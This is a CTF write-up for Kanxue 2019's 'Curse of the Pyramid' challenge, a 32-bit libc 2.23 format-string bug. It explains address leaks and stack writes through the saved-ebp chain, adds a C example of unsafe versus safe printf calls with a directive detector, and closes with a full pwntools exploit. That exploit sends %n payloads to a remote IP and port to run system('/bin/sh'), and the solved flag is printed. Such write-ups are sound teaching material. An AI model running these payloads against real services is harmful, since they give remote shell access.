
[Original] [2019 Kanxue CTF] Q2 Season, Challenge 3: "Curse of the Pyramid" Writeup

2019-7-2 00:12 2541


[2019 Kanxue CTF] Q2 Season, Challenge 3: "Curse of the Pyramid" Writeup

This is a fairly simple format-string (fmt) pwn challenge, and the only libc 2.23 pwn challenge of the season.
Because the target is a 32-bit ELF, everything is much easier. There are just two small restrictions: first, the input is stored in .bss and the binary is compiled with PIE, so there is no fixed address to write to; second, each input may be at most 24 bytes.
The overall approach (all of it format-string abuse): leak a libc address and a stack address from the stack (the stack holds an ebp chain, and a saved stack pointer naturally reveals a stack address). By writing through one saved-ebp pointer you can turn it into a pointer to any other stack slot, which gives an arbitrary write on the stack. Finally, build a ROP chain calling system() on the stack to get a shell.
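The root cause of this whole chain is a single pattern in the target: user input passed to a printf-family function as the format argument. The following C program is an added example, not the challenge binary or the author's code; the function names (render_unsafe, render_safe, has_format_directive) and the sample inputs are assumptions made for illustration. It shows the vulnerable call beside the hardened one, captured into a buffer so the difference is visible, plus a small heuristic that flags inputs carrying real format directives such as the "%11$p%5$p" leak probe used in this writeup.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: the user message itself is used as the format string,
 * so every '%' directive inside it is interpreted by printf. This is the
 * bug class the challenge exploits. The result is captured into a static
 * buffer so it can be inspected; only a benign "%%" input is used here. */
const char *render_unsafe(const char *msg) {
    static char out[128];
    snprintf(out, sizeof out, msg);   /* format = untrusted data (bad) */
    return out;
}

/* Hardened form: the format string is a literal and the user data is only
 * ever consumed as a %s argument, so directives in msg are copied verbatim
 * and never interpreted. */
const char *render_safe(const char *msg) {
    static char out[128];
    snprintf(out, sizeof out, "%s", msg);
    return out;
}

/* Detection heuristic: return 1 if msg contains an unescaped '%' (a real
 * directive), 0 if it only contains literal text or "%%". Useful for logging
 * or alerting on format-string probes against a service. */
int has_format_directive(const char *msg) {
    for (const char *p = msg; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* "%%" is a literal percent */
        return 1;
    }
    return 0;
}

int main(void) {
    /* Constructed sample inputs for the demonstration. */
    const char *benign = "100%% done";
    const char *probe  = "%11$p%5$p";   /* the leak payload from the writeup */

    printf("unsafe: %s\n", render_unsafe(benign)); /* "100% done": %% consumed */
    printf("safe:   %s\n", render_safe(benign));   /* "100%% done": verbatim */
    printf("probe flagged: %d\n", has_format_directive(probe));
    printf("benign flagged: %d\n", has_format_directive(benign));
    return 0;
}
```

Compiling with -Wformat-security (part of -Wformat=2) makes the compiler flag the render_unsafe call, which is the cheapest way to find this pattern before it ships.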


The final exploit is as follows:

#!/usr/bin/env python
import sys
from pwn import *

# short aliases for the pwntools I/O helpers
s = lambda a: io.send(a)
sa = lambda a, b: io.sendafter(a, b)
st = lambda a, b: io.sendthen(a, b)
sl = lambda a: io.sendline(a)
sla = lambda a, b: io.sendlineafter(a, b)
slt = lambda a, b: io.sendlinethen(a, b)
r = lambda a=0x100: io.recv(a)
rl = lambda: io.recvline()
ru = lambda a: io.recvuntil(a)
it = lambda: io.interactive()


def pwn():
    #flag{c6671fc0-cea3-42ef-8af0-c20c65f854be}
    # libc 2.23 offsets for the remote libc
    libc_main_off = 0x18540   # __libc_start_main
    bin_off = 0x15902B        # "/bin/sh"
    sys_off = 0x3A940         # system

    # offsets for the local libc (kept for local testing)
    # libc_main_off = 0x18540
    # bin_off = 0x15BA0B
    # sys_off = 0x3Ada0

    # Leak: arg 11 is the return address into __libc_start_main (+247),
    # arg 5 is a saved ebp from the ebp chain, i.e. a stack address.
    sla('Choice:','1')
    sla('to say:','%11$p%5$p')
    res = rl()
    libc_main_addr = int(res[2:10],16) - 247
    stack_addr = int(res[12:20],16)
    sys_addr = libc_main_addr - libc_main_off + sys_off
    bin_addr = libc_main_addr - libc_main_off + bin_off
    log.info('sys addr :'+hex(sys_addr))

    # Arbitrary stack write, two bytes at a time, each payload under 24 bytes:
    # %5$hn writes through the saved ebp at arg 5, which points at the stack
    # slot read as arg 53; that turns slot 53 into a pointer to the target
    # address, and %53$hn then writes the value through it.
    # system() address: low half, then high half, at stack_addr-0x98
    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x98)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((sys_addr)&0xffff))

    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x98+2)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((sys_addr>>16)&0xffff))

    # "/bin/sh" pointer (system's first argument) at stack_addr-0x90;
    # the 4 bytes in between at stack_addr-0x94 serve as system's fake return address
    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x90)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((bin_addr)&0xffff))

    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x90+2)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((bin_addr>>16)&0xffff))

    # gdb.attach(io,'b main')
    # leave the menu so the function returns into the system() chain written above
    sla('Choice:','2')

    it()


if __name__ == '__main__':
    context(arch='i386', kernel='i386', os='linux')
    HOST, PORT = '152.136.18.34', 9999
    # elf = ELF('./libc.so.6')
    if len(sys.argv) > 1 and sys.argv[1] == 'l':
        # local run: python exp.py l
        io = process('./format')#,env = {'LD_PRELOAD':'./libc.so.6'})
        context.log_level = 'debug'
    else:
        io = remote(HOST, PORT)
        # context.log_level = 'debug'
    pwn()

